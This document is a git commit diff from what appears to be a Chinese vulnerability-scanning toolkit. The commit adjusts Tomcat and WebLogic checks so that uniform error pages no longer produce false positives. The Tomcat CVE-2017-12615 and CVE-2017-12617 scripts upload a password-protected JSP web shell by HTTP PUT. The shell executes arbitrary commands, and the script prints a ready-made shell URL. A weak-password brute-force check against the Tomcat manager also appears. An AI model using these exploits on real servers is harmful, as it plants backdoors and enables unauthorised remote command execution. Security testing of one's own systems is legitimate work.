fix: 解决了部分网站因统一报错页面导致的tomcat漏洞误报的问题

2019-10-21 18:40:12 +08:00
parent e8780257fc
commit 2865be4d3d
6 changed files with 22 additions and 13 deletions
--- a/README.md
+++ b/README.md
@@ -2,6 +2,10 @@

 常见漏洞快速检测，目前包含以下漏洞。  

+已发现的BUG：  
+
+1. 有些漏洞的判断依据为网页返回信息，但部分网站设置了统一的错误页面，如统一的404页面，因此造成误报。后续针对此类问题通用的解决方式是显示返回页面的大小。
+
 ## Tomcat

 - CVE_2017_12615 / CVE_2017_12617  
--- a/tomcat/CVE_2017_12615.py
+++ b/tomcat/CVE_2017_12615.py
@@ -17,7 +17,8 @@ def attack(URL):
    url = URL + '/T68t8YT86.jsp/'
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers={"User-Agent":user_agent}
-    data="""<%
+    data="""CVE-2017-12615
+    <%
    if("fff".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
@@ -33,7 +34,7 @@ def attack(URL):
        requests.put(url, headers=headers, data=data)
        time.sleep(2)
        verify_response = requests.get(url[:-1], headers=headers)
-        if verify_response.status_code == 200:
+        if verify_response.status_code == 200 and 'CVE-2017-12615' in verify_response.text:
            print('存在-Tomcat-CVE-2017-12615!!!')
            print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami')
        else :
--- a/tomcat/CVE_2017_12617.py
+++ b/tomcat/CVE_2017_12617.py
@@ -20,7 +20,8 @@ def gen_shell():

 def construct_put(url, f):
    #print(url)
-    evil = """<%
+    evil = """CVE-2017-12617
+    <%
    if("fff".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
--- a/tomcat/example_vulnerability.py
+++ b/tomcat/example_vulnerability.py
@@ -38,12 +38,12 @@ def attack(URL):

            if verify_response.status_code == 200 or 304 or 401:
                try:
-                    print('页面返回状态码：'+str(verify_response.status_code)+'    '+url)
-                except:
+                    print('页面返回状态码：'+str(verify_response.status_code)+'  '+'页面返回大小为：'+str(len(verify_response.text))+'  '+url) # 因为部分网站设置了统一的404页面，造成误报，因此添加返回长度来进行辅助判断
+                except Exception:
                    pass
            else:
                continue
-        except :
+        except Exception:
            print("Someerror!")
    print('[+]检测结束-Tomcat-example_vulnerability。[+]')
    print('\n')
--- a/tomcat/tomcat_weakpasswd.py
+++ b/tomcat/tomcat_weakpasswd.py
@@ -24,8 +24,8 @@ def attack(URL):
            headers = {"User-Agent": user_agent,"Authorization":Authorization}
            try:
                r = requests.get(url,headers=headers, verify=False)
-                if r.status_code == 200:
-                    print('[+]发现弱口令'+Authorization)
+                if r.status_code == 200 and 'Tomcat Web Application Manager' in r.text:
+                    print('[+]发现弱口令'+ txt)
                elif r.status_code == 401:
                    print('账户密码错误：', txt)
                else:
--- a/weblogic/CVE_2017_10271.py
+++ b/weblogic/CVE_2017_10271.py
@@ -1,9 +1,12 @@
 # -*- coding: utf-8 -*-
+import sys
 import requests
+import time
 from random import *
 import string


+
 '''
 Usage:
    moon.py -u  weblogic http://127.0.0.1:7001